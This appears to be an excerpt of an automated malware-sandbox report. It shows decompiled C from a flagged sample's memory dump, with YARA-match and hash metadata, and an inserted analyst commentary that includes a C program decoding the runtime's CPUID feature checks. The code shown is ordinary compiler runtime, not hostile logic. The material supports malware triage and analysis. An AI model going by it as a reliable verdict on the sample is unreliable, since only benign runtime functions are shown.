                                                  				_v24 = _v24 & 0x00000000;
                                                  				 *0x412030 =  *0x412030 | 0x00000002;
                                                  				 *0x412b2c = 1;
                                                  				_t86 =  &_v48;
                                                  				_push(1);
                                                  				asm("cpuid");
                                                  				_pop(_t73);
                                                  				 *_t86 = 0;
                                                  				 *((intOrPtr*)(_t86 + 4)) = 1;
                                                  				 *((intOrPtr*)(_t86 + 8)) = 0;
                                                  				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
                                                  				_v16 = _v48;
                                                   				_v8 = _v36 ^ 0x49656e69;  // CPUID.0:EDX ^ "ineI"
                                                   				_v12 = _v40 ^ 0x6c65746e; // CPUID.0:ECX ^ "ntel"
                                                  				_push(1);
                                                  				asm("cpuid");
                                                  				_t75 =  &_v48;
                                                  				 *_t75 = 1;
                                                  				 *((intOrPtr*)(_t75 + 4)) = _t73;
                                                  				 *((intOrPtr*)(_t75 + 8)) = 0;
                                                  				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
                                                   				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) { // CPUID.0:EBX ^ "Genu": non-zero means not "GenuineIntel"
                                                  					L9:
                                                  					_t91 =  *0x412b30; // 0x2
                                                  					L10:
                                                  					_v32 = _v36;
                                                  					_t59 = _v40;
                                                  					_v8 = _t59;
                                                  					_v28 = _t59;
                                                  					if(_v16 >= 7) {
                                                  						_t65 = 7;
                                                  						_push(_t75);
                                                  						asm("cpuid");
                                                  						_t77 =  &_v48;
                                                  						 *_t77 = _t65;
                                                  						 *((intOrPtr*)(_t77 + 4)) = _t75;
                                                  						 *((intOrPtr*)(_t77 + 8)) = 0;
                                                  						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
                                                  						_t66 = _v44;
                                                  						_v24 = _t66;
                                                  						_t59 = _v8;
                                                   						if((_t66 & 0x00000200) != 0) { // CPUID.7:EBX bit 9 = ERMS (enhanced rep movsb/stosb)
                                                   							 *0x412b30 = _t91 | 0x00000002; // __favor |= ENFSTRG
                                                  						}
                                                  					}
                                                   					if((_t59 & 0x00100000) != 0) { // CPUID.1:ECX bit 20 = SSE4.2
                                                  						 *0x412030 =  *0x412030 | 0x00000004;
                                                  						 *0x412b2c = 2;
                                                   						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) { // bit 27 = OSXSAVE, bit 28 = AVX
                                                  							asm("xgetbv");
                                                  							_v20 = _t59;
                                                  							_v16 = _t84;
                                                   							if((_v20 & 0x00000006) == 6 && 0 == 0) { // XCR0 bits 1|2: OS saves XMM and YMM state
                                                  								_t62 =  *0x412030; // 0x2f
                                                  								_t63 = _t62 | 0x00000008;
                                                  								 *0x412b2c = 3;
                                                  								 *0x412030 = _t63;
                                                   								if((_v24 & 0x00000020) != 0) { // CPUID.7:EBX bit 5 = AVX2
                                                  									 *0x412b2c = 5;
                                                  									 *0x412030 = _t63 | 0x00000020;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					goto L20;
                                                  				}
                                                   				_t68 = _v48 & 0x0fff3ff0; // CPUID.1:EAX family/model signature, stepping masked off
                                                   				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) { // Intel Atom signatures -> __favor |= ATOM
                                                  					_t94 =  *0x412b30; // 0x2
                                                  					_t91 = _t94 | 0x00000001;
                                                  					 *0x412b30 = _t91;
                                                  					goto L10;
                                                  				} else {
                                                  					goto L9;
                                                  				}
                                                  			}

                                                   Line addresses (per-line address column of the listing above): 0x0040208d to 0x00402230

                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004020A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-3916222277
                                                  • Opcode ID: 81a6643d8d766bf2a1e14be1042f56af57549ae9e9951545f306693b5f2864aa
                                                  • Instruction ID: 00a0b3a4e6e1703bd72bf57860e68eebd2cbb95fa7def28fde3004e4e54fdf29
                                                  • Opcode Fuzzy Hash: 81a6643d8d766bf2a1e14be1042f56af57549ae9e9951545f306693b5f2864aa
                                                  • Instruction Fuzzy Hash: 02515AB19102099BDB15CFA9DA8979ABBF4FB08314F14C57AD804EB390D3B8A915CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
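The cpuid/xgetbv routine above is the MSVC CRT's `__isa_available_init`, which every binary built with that compiler carries; the IsProcessorFeaturePresent call, the vendor-string XORs and the family/model compares are compiler runtime, not capability probing written by the sample's author. The C below is an added example (not code from the report or the sample) that decodes the same register values the listing tests, so the constants can be checked against it. It assumes the three globals are the CRT variables (0x412b2c = `__isa_available`, 0x412030 = `__isa_enabled`, 0x412b30 = `__favor`), an inference from the bit patterns; the listing's own `// 0x2f` annotation on 0x412030 is exactly all five enable bits set. Register values are passed in as constructed snapshots rather than executed, so it runs on any host.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Values the CRT stores in __isa_available / __isa_enabled / __favor (assumed mapping). */
enum isa_level { ISA_X86 = 0, ISA_SSE2 = 1, ISA_SSE42 = 2, ISA_AVX = 3, ISA_AVX2 = 5 };
enum isa_enabled_bits { EN_X86 = 0x01, EN_SSE2 = 0x02, EN_SSE42 = 0x04, EN_AVX = 0x08, EN_AVX2 = 0x20 };
enum favor_bits { FAVOR_ATOM = 0x01, FAVOR_ENFSTRG = 0x02 };

/* "Genu", "ineI", "ntel" as little-endian dwords: the three XOR constants in the listing. */
#define VENDOR_EBX_GENU 0x756e6547u
#define VENDOR_EDX_INEI 0x49656e69u
#define VENDOR_ECX_NTEL 0x6c65746eu
#define CPUID1_ECX_SSE42   (1u << 20)   /* CPUID.1:ECX bits tested by the listing */
#define CPUID1_ECX_OSXSAVE (1u << 27)
#define CPUID1_ECX_AVX     (1u << 28)
#define CPUID7_EBX_AVX2    (1u << 5)    /* CPUID.7.0:EBX bits tested by the listing */
#define CPUID7_EBX_ERMS    (1u << 9)
#define XCR0_XMM_YMM       0x6u         /* XCR0 bits 1|2: OS saves XMM and YMM state */

/* Register values supplied as data, so the decode runs offline instead of executing CPUID. */
typedef struct {
    int      sse2_present;                               /* IsProcessorFeaturePresent(0xa) */
    uint32_t leaf0_eax, leaf0_ebx, leaf0_ecx, leaf0_edx; /* max basic leaf, vendor string */
    uint32_t leaf1_eax, leaf1_ecx;                       /* signature, feature flags */
    uint32_t leaf7_ebx;                                  /* structured extended features */
    uint32_t xcr0;                                       /* XGETBV(0), low dword */
} cpu_snapshot;

typedef struct { int isa_available; uint32_t isa_enabled; uint32_t favor; } isa_state;

/* Family/model signatures (eax & 0x0fff3ff0) the listing compares against: Intel Atom parts. */
static int is_atom_signature(uint32_t sig)
{
    static const uint32_t atoms[] = { 0x106c0, 0x20660, 0x20670, 0x30650, 0x30660, 0x30670 };
    for (size_t i = 0; i < sizeof atoms / sizeof atoms[0]; i++)
        if (sig == atoms[i]) return 1;
    return 0;
}

isa_state decode_isa(cpu_snapshot c)
{
    isa_state s = { ISA_X86, EN_X86, 0 };
    if (!c.sse2_present)                        /* IsProcessorFeaturePresent(0xa) == 0 */
        return s;
    s.isa_enabled |= EN_SSE2;
    s.isa_available = ISA_SSE2;

    int intel = c.leaf0_ebx == VENDOR_EBX_GENU && c.leaf0_edx == VENDOR_EDX_INEI &&
                c.leaf0_ecx == VENDOR_ECX_NTEL;
    if (intel && is_atom_signature(c.leaf1_eax & 0x0fff3ff0u))
        s.favor |= FAVOR_ATOM;

    uint32_t leaf7_ebx = 0;                     /* _v24 stays 0 when leaf 7 is unsupported */
    if (c.leaf0_eax >= 7) {
        leaf7_ebx = c.leaf7_ebx;
        if (leaf7_ebx & CPUID7_EBX_ERMS)
            s.favor |= FAVOR_ENFSTRG;
    }

    if (!(c.leaf1_ecx & CPUID1_ECX_SSE42))
        return s;
    s.isa_enabled |= EN_SSE42;
    s.isa_available = ISA_SSE42;

    /* AVX needs the CPU bit, OSXSAVE, and an XCR0 showing the OS saves YMM state. */
    if ((c.leaf1_ecx & CPUID1_ECX_OSXSAVE) && (c.leaf1_ecx & CPUID1_ECX_AVX) &&
        (c.xcr0 & XCR0_XMM_YMM) == XCR0_XMM_YMM) {
        s.isa_enabled |= EN_AVX;
        s.isa_available = ISA_AVX;
        if (leaf7_ebx & CPUID7_EBX_AVX2) {
            s.isa_enabled |= EN_AVX2;
            s.isa_available = ISA_AVX2;
        }
    }
    return s;
}

/* Constructed snapshots (not captured from real hardware). */
cpu_snapshot sample_intel_avx2(void)   /* Haswell-class: all bits on, YMM enabled */
{
    cpu_snapshot c = { 1, 0xd, VENDOR_EBX_GENU, VENDOR_ECX_NTEL, VENDOR_EDX_INEI, 0x000306c3u,
                       CPUID1_ECX_SSE42 | CPUID1_ECX_OSXSAVE | CPUID1_ECX_AVX,
                       CPUID7_EBX_AVX2 | CPUID7_EBX_ERMS, 0x7u };
    return c;
}
cpu_snapshot sample_intel_atom(void)   /* Bonnell Atom: signature 0x106c0, SSSE3 but no SSE4.2 */
{
    cpu_snapshot c = { 1, 0xa, VENDOR_EBX_GENU, VENDOR_ECX_NTEL, VENDOR_EDX_INEI, 0x000106c2u,
                       1u << 9, 0, 0 };
    return c;
}
cpu_snapshot sample_amd_no_ymm(void)   /* "AuthenticAMD", AVX advertised but OS saves XMM only */
{
    cpu_snapshot c = { 1, 0xd, 0x68747541u, 0x444d4163u, 0x69746e65u, 0x00100f42u,
                       CPUID1_ECX_SSE42 | CPUID1_ECX_OSXSAVE | CPUID1_ECX_AVX,
                       CPUID7_EBX_AVX2 | CPUID7_EBX_ERMS, 0x2u };
    return c;
}

int main(void)
{
    cpu_snapshot (*samples[])(void) = { sample_intel_avx2, sample_intel_atom, sample_amd_no_ymm };
    for (size_t i = 0; i < 3; i++) {
        isa_state s = decode_isa(samples[i]());
        printf("available=%d enabled=0x%02x favor=0x%x\n", s.isa_available, s.isa_enabled, s.favor);
    }
    return 0;
}
```

The third snapshot covers the case the listing guards with the xgetbv check: AVX and OSXSAVE set in CPUID but XCR0 without the YMM bit, which leaves the ISA level at SSE4.2 even though leaf 7 reports AVX2. When triaging a report, a CPUID block with these exact constants is a compiler fingerprint, and the "IsProcessorFeaturePresent" hit should not be scored as environment detection.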

                                                  C-Code - Quality: 54%
                                                  			E00404A29(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                  				intOrPtr _v8;
                                                  				signed int _v12;
                                                  				intOrPtr _v28;
                                                  				signed int _v32;
                                                  				WCHAR* _v36;
                                                  				signed int _v48;
                                                  				intOrPtr _v556;
                                                  				intOrPtr _v558;
                                                  				char _v560;
                                                  				void _v604;
                                                  				intOrPtr* _v608;
                                                  				signed int _v612;
                                                  				signed int _v616;
                                                  				intOrPtr _v644;
                                                  				intOrPtr _v648;
                                                  				void* __edi;
                                                  				signed int _t40;
                                                  				signed int _t45;
                                                  				signed int _t48;
                                                  				signed int _t50;
                                                  				signed int _t51;
                                                  				signed char _t53;
                                                  				signed int _t62;
                                                  				void* _t64;
                                                  				union _FINDEX_INFO_LEVELS _t66;
                                                  				union _FINDEX_INFO_LEVELS _t67;
                                                  				signed int _t70;
                                                  				intOrPtr* _t71;
                                                  				signed int _t74;
                                                  				void* _t80;
                                                  				void* _t82;
                                                  				signed int _t83;
                                                  				void* _t87;
                                                  				WCHAR* _t88;
                                                  				intOrPtr* _t92;
                                                  				intOrPtr _t95;
                                                  				void* _t97;
                                                  				signed int _t98;
                                                  				intOrPtr* _t102;
                                                  				signed int _t105;
                                                  				void* _t108;
                                                  				intOrPtr _t109;
                                                  				void* _t110;
                                                  				void* _t112;
                                                  				void* _t113;
                                                  				signed int _t115;
                                                  				void* _t116;
                                                  				union _FINDEX_INFO_LEVELS _t117;
                                                  				void* _t121;
                                                  				void* _t122;
                                                  				void* _t123;
                                                  				signed int _t124;
                                                  				void* _t125;
                                                  				signed int _t130;
                                                  				void* _t131;
                                                  				signed int _t132;
                                                  				void* _t133;
                                                  				void* _t134;
                                                  
                                                  				_push(__ecx);
                                                  				_t92 = _a4;
                                                  				_t2 = _t92 + 2; // 0x2
                                                  				_t108 = _t2;
                                                  				do {
                                                  					_t40 =  *_t92;
                                                  					_t92 = _t92 + 2;
                                                  				} while (_t40 != 0);
                                                  				_t115 = _a12;
                                                  				_t95 = (_t92 - _t108 >> 1) + 1;
                                                  				_v8 = _t95;
                                                  				if(_t95 <= (_t40 | 0xffffffff) - _t115) {
                                                  					_t5 = _t115 + 1; // 0x1
                                                  					_t87 = _t5 + _t95;
                                                  					_t122 = E00403ECE(_t95, _t87, 2);
                                                  					_t97 = _t121;
                                                  					__eflags = _t115;
                                                  					if(_t115 == 0) {
                                                  						L6:
                                                  						_push(_v8);
                                                  						_t87 = _t87 - _t115;
                                                  						_t45 = E004047AD(_t97, _t122 + _t115 * 2, _t87, _a4);
                                                  						_t132 = _t131 + 0x10;
                                                  						__eflags = _t45;
                                                  						if(__eflags != 0) {
                                                  							goto L9;
                                                  						} else {
                                                  							_t80 = E00404CA2(_a16, __eflags, _t122);
                                                  							E00403E03(0);
                                                  							_t82 = _t80;
                                                  							goto L8;
                                                  						}
                                                  					} else {
                                                  						_push(_t115);
                                                  						_t83 = E004047AD(_t97, _t122, _t87, _a8);
                                                  						_t132 = _t131 + 0x10;
                                                  						__eflags = _t83;
                                                  						if(_t83 != 0) {
                                                  							L9:
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push(0);
                                                  							E00404649();
                                                  							asm("int3");
                                                  							_t130 = _t132;
                                                  							_t133 = _t132 - 0x260;
                                                  							_t48 =  *0x412014; // 0x9e6834eb
                                                  							_v48 = _t48 ^ _t130;
                                                  							_t109 = _v28;
                                                  							_t98 = _v32;
                                                  							_push(_t87);
                                                  							_t88 = _v36;
                                                  							_push(_t122);
                                                  							_push(_t115);
                                                  							_t123 = 0x5c;
                                                  							_v644 = _t109;
                                                  							_v648 = 0x2f;
                                                  							_t116 = 0x3a;
                                                  							while(1) {
                                                  								__eflags = _t98 - _t88;
                                                  								if(_t98 == _t88) {
                                                  									break;
                                                  								}
                                                  								_t50 =  *_t98 & 0x0000ffff;
                                                  								__eflags = _t50 - _v612;
                                                  								if(_t50 != _v612) {
                                                  									__eflags = _t50 - _t123;
                                                  									if(_t50 != _t123) {
                                                  										__eflags = _t50 - _t116;
                                                  										if(_t50 != _t116) {
                                                  											_t98 = _t98 - 2;
                                                  											__eflags = _t98;
                                                  											continue;
                                                  										}
                                                  									}
                                                  								}
                                                  								break;
                                                  							}
                                                  							_t124 =  *_t98 & 0x0000ffff;
                                                  							__eflags = _t124 - _t116;
                                                  							if(_t124 != _t116) {
                                                  								L19:
                                                  								_t51 = _t124;
                                                  								_t117 = 0;
                                                  								_t110 = 0x2f;
                                                  								__eflags = _t51 - _t110;
                                                  								if(_t51 == _t110) {
                                                  									L23:
                                                  									_t53 = 1;
                                                  									__eflags = 1;
                                                  								} else {
                                                  									_t112 = 0x5c;
                                                  									__eflags = _t51 - _t112;
                                                  									if(_t51 == _t112) {
                                                  										goto L23;
                                                  									} else {
                                                  										_t113 = 0x3a;
                                                  										__eflags = _t51 - _t113;
                                                  										if(_t51 == _t113) {
                                                  											goto L23;
                                                  										} else {
                                                  											_t53 = 0;
                                                  										}
                                                  									}
                                                  								}
                                                  								_t101 = (_t98 - _t88 >> 1) + 1;
                                                  								asm("sbb eax, eax");
                                                  								_v612 =  ~(_t53 & 0x000000ff) & (_t98 - _t88 >> 0x00000001) + 0x00000001;
                                                  								E00402460(_t117,  &_v604, _t117, 0x250);
                                                  								_t134 = _t133 + 0xc;
                                                  								_t125 = FindFirstFileExW(_t88, _t117,  &_v604, _t117, _t117, _t117);
                                                  								__eflags = _t125 - 0xffffffff;
                                                  								if(_t125 != 0xffffffff) {
                                                  									_t102 = _v608;
                                                  									_t62 =  *((intOrPtr*)(_t102 + 4)) -  *_t102;
                                                  									__eflags = _t62;
                                                  									_v616 = _t62 >> 2;
                                                  									_t64 = 0x2e;
                                                  									do {
                                                  										__eflags = _v560 - _t64;
                                                  										if(_v560 != _t64) {
                                                  											L36:
                                                  											_push(_t102);
                                                  											_t66 = E00404A29(_t102,  &_v560, _t88, _v612);
                                                  											_t134 = _t134 + 0x10;
                                                  											__eflags = _t66;
                                                  											if(_t66 != 0) {
                                                  												goto L26;
                                                  											} else {
                                                  												goto L37;
                                                  											}
                                                  										} else {
                                                  											__eflags = _v558 - _t117;
                                                  											if(_v558 == _t117) {
                                                  												goto L37;
                                                  											} else {
                                                  												__eflags = _v558 - _t64;
                                                  												if(_v558 != _t64) {
                                                  													goto L36;
                                                  												} else {
                                                  													__eflags = _v556 - _t117;
                                                  													if(_v556 == _t117) {
                                                  														goto L37;
                                                  													} else {
                                                  														goto L36;
                                                  													}
                                                  												}
                                                  											}
                                                  										}
                                                  										goto L40;
                                                  										L37:
                                                  										_t70 =  *0x40c0f8(_t125,  &_v604);
                                                  										_t102 = _v608;
                                                  										__eflags = _t70;
                                                  										_t64 = 0x2e;
                                                  									} while (_t70 != 0);
                                                  									_t71 = _t102;
                                                  									_t105 = _v616;
                                                  									_t111 =  *_t71;
                                                  									_t74 =  *((intOrPtr*)(_t71 + 4)) -  *_t71 >> 2;
                                                  									__eflags = _t105 - _t74;
                                                  									if(_t105 != _t74) {
                                                  										E004074E0(_t111 + _t105 * 4, _t74 - _t105, 4, E00404844);
                                                  									}
                                                  								} else {
                                                  									_push(_v608);
                                                  									_t66 = E00404A29(_t101, _t88, _t117, _t117);
                                                  									L26:
                                                  									_t117 = _t66;
                                                  								}
                                                  								__eflags = _t125 - 0xffffffff;
                                                  								if(_t125 != 0xffffffff) {
                                                  									 *0x40c0f0(_t125);
                                                  								}
                                                  								_t67 = _t117;
                                                  							} else {
                                                  								__eflags = _t98 -  &(_t88[1]);
                                                  								if(_t98 ==  &(_t88[1])) {
                                                  									goto L19;
                                                  								} else {
                                                  									_push(_t109);
                                                  									_t67 = E00404A29(_t98, _t88, 0, 0);
                                                  								}
                                                  							}
                                                  							__eflags = _v12 ^ _t130;
                                                  							E004018CC();
                                                  							return _t67;
                                                  						} else {
                                                  							goto L6;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					_t82 = 0xc;
                                                  					L8:
                                                  					return _t82;
                                                  				}
                                                  				L40:
                                                  			}

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-2043925204
                                                  • Opcode ID: 238c64b91dc00fc8aa7441f00327e0ccbbd6587d23c937c2b2e4721a264c2311
                                                  • Instruction ID: ba1068fc9c078a1ad814dd17ce5e53bd1395a2ce151ae24c2f61dc23761eb13f
                                                  • Opcode Fuzzy Hash: 238c64b91dc00fc8aa7441f00327e0ccbbd6587d23c937c2b2e4721a264c2311
                                                  • Instruction Fuzzy Hash: 7C411AB16002196ACB249FB9DC49EBB77B8EBC4714F50427AFA05E72C0E674DD41CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID:
                                                  • API String ID: 4168288129-0
                                                  • Opcode ID: 03c610b932e34c4943e00feac407a1e98f44f828b1dc76974e7330a0e9cafbcb
                                                  • Instruction ID: 02cf0647dbe53e204b23e86fa7e90d44236619e42a68a14c5362187b63440f51
                                                  • Opcode Fuzzy Hash: 03c610b932e34c4943e00feac407a1e98f44f828b1dc76974e7330a0e9cafbcb
                                                  • Instruction Fuzzy Hash: 2DC23871E046298FDB25CE28DD807EABBF5EB45304F1445EAD84EE7281E774AE818F41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040A2A5(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                                  				signed int _t172;
                                                  				signed int _t175;
                                                  				signed int _t178;
                                                  				signed int* _t179;
                                                  				signed int _t195;
                                                  				signed int _t199;
                                                  				signed int _t202;
                                                  				void* _t203;
                                                  				void* _t206;
                                                  				signed int _t209;
                                                  				void* _t210;
                                                  				signed int _t225;
                                                  				unsigned int* _t240;
                                                  				signed char _t242;
                                                  				signed int* _t250;
                                                  				unsigned int* _t256;
                                                  				signed int* _t257;
                                                  				signed char _t259;
                                                  				long _t262;
                                                  				signed int* _t265;
                                                  
                                                  				 *(_a4 + 4) = 0;
                                                  				_t262 = 0xc000000d;
                                                  				 *(_a4 + 8) = 0;
                                                  				 *(_a4 + 0xc) = 0;
                                                  				_t242 = _a12;
                                                  				if((_t242 & 0x00000010) != 0) {
                                                  					_t262 = 0xc000008f;
                                                  					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                                  				}
                                                  				if((_t242 & 0x00000002) != 0) {
                                                  					_t262 = 0xc0000093;
                                                  					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                                  				}
                                                  				if((_t242 & 0x00000001) != 0) {
                                                  					_t262 = 0xc0000091;
                                                  					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                                  				}
                                                  				if((_t242 & 0x00000004) != 0) {
                                                  					_t262 = 0xc000008e;
                                                  					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                  				}
                                                  				if((_t242 & 0x00000008) != 0) {
                                                  					_t262 = 0xc0000090;
                                                  					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                                  				}
                                                  				_t265 = _a8;
                                                  				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                                  				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                                                  				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                                  				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                                  				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                                                  				_t259 = E00407FAF(_a4);
                                                  				if((_t259 & 0x00000001) != 0) {
                                                  					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                                  				}
                                                  				if((_t259 & 0x00000004) != 0) {
                                                  					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                                  				}
                                                  				if((_t259 & 0x00000008) != 0) {
                                                  					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                                  				}
                                                  				if((_t259 & 0x00000010) != 0) {
                                                  					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                                  				}
                                                  				if((_t259 & 0x00000020) != 0) {
                                                  					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                                  				}
                                                  				_t172 =  *_t265 & 0x00000c00;
                                                  				if(_t172 == 0) {
                                                  					 *_a4 =  *_a4 & 0xfffffffc;
                                                  				} else {
                                                  					if(_t172 == 0x400) {
                                                  						_t257 = _a4;
                                                  						_t225 =  *_t257 & 0xfffffffd | 1;
                                                  						L26:
                                                  						 *_t257 = _t225;
                                                  						L29:
                                                  						_t175 =  *_t265 & 0x00000300;
                                                  						if(_t175 == 0) {
                                                  							_t250 = _a4;
                                                  							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                                                  							L35:
                                                  							 *_t250 = _t178;
                                                  							L36:
                                                  							_t179 = _a4;
                                                  							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                  							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                  							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                                  							if(_a28 == 0) {
                                                  								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                                  								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                                  								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                  								_t254 = _a4;
                                                  								_t240 = _a24;
                                                  								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                                  								 *(_a4 + 0x50) =  *_t240;
                                                  							} else {
                                                  								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                                  								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                                  								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                  								_t240 = _a24;
                                                  								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                                  								 *(_a4 + 0x50) =  *_t240;
                                                  							}
                                                  							E00407F15(_t254);
                                                  							RaiseException(_t262, 0, 1,  &_a4);
                                                  							_t256 = _a4;
                                                  							if((_t256[2] & 0x00000010) != 0) {
                                                  								 *_t265 =  *_t265 & 0xfffffffe;
                                                  							}
                                                  							if((_t256[2] & 0x00000008) != 0) {
                                                  								 *_t265 =  *_t265 & 0xfffffffb;
                                                  							}
                                                  							if((_t256[2] & 0x00000004) != 0) {
                                                  								 *_t265 =  *_t265 & 0xfffffff7;
                                                  							}
                                                  							if((_t256[2] & 0x00000002) != 0) {
                                                  								 *_t265 =  *_t265 & 0xffffffef;
                                                  							}
                                                  							if((_t256[2] & 0x00000001) != 0) {
                                                  								 *_t265 =  *_t265 & 0xffffffdf;
                                                  							}
                                                  							_t195 =  *_t256 & 0x00000003;
                                                  							if(_t195 == 0) {
                                                  								 *_t265 =  *_t265 & 0xfffff3ff;
                                                  							} else {
                                                  								_t206 = _t195 - 1;
                                                  								if(_t206 == 0) {
                                                  									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                                                  									L55:
                                                  									 *_t265 = _t209;
                                                  									L58:
                                                  									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                                                  									if(_t199 == 0) {
                                                  										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                                                  										L64:
                                                  										 *_t265 = _t202;
                                                  										L65:
                                                  										if(_a28 == 0) {
                                                  											 *_t240 = _t256[0x14];
                                                  										} else {
                                                  											 *_t240 = _t256[0x14];
                                                  										}
                                                  										return _t202;
                                                  									}
                                                  									_t203 = _t199 - 1;
                                                  									if(_t203 == 0) {
                                                  										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                                                  										goto L64;
                                                  									}
                                                  									_t202 = _t203 - 1;
                                                  									if(_t202 == 0) {
                                                  										 *_t265 =  *_t265 & 0xfffff3ff;
                                                  									}
                                                  									goto L65;
                                                  								}
                                                  								_t210 = _t206 - 1;
                                                  								if(_t210 == 0) {
                                                  									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                                                  									goto L55;
                                                  								}
                                                  								if(_t210 == 1) {
                                                  									 *_t265 =  *_t265 | 0x00000c00;
                                                  								}
                                                  							}
                                                  							goto L58;
                                                  						}
                                                  						if(_t175 == 0x200) {
                                                  							_t250 = _a4;
                                                  							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                                                  							goto L35;
                                                  						}
                                                  						if(_t175 == 0x300) {
                                                  							 *_a4 =  *_a4 & 0xffffffe3;
                                                  						}
                                                  						goto L36;
                                                  					}
                                                  					if(_t172 == 0x800) {
                                                  						_t257 = _a4;
                                                  						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                                                  						goto L26;
                                                  					}
                                                  					if(_t172 == 0xc00) {
                                                  						 *_a4 =  *_a4 | 0x00000003;
                                                  					}
                                                  				}
                                                  			}

                                                   Instruction addresses for the listing above span 0x0040a2b3 to 0x0040a595 (the per-line address column of the decompiler view is collapsed here; the RaiseException call at 0x0040a4d2 lies inside that range).

                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0040A2A0,?,?,00000008,?,?,00409F40,00000000), ref: 0040A4D2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: e643de11c9a7a3b8f77e7df90059e9f175bcee2aa11d033e8018bcf56453dcfc
                                                  • Instruction ID: 9d579f0cae407368a1834575cb2af6ffccebdcf914ee91eecef0f970b264d7fa
                                                  • Opcode Fuzzy Hash: e643de11c9a7a3b8f77e7df90059e9f175bcee2aa11d033e8018bcf56453dcfc
                                                  • Instruction Fuzzy Hash: 81B17B355106089FD714CF28C48AB657BE0FF44364F258669E89ADF2E1C339E9A2CB46
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
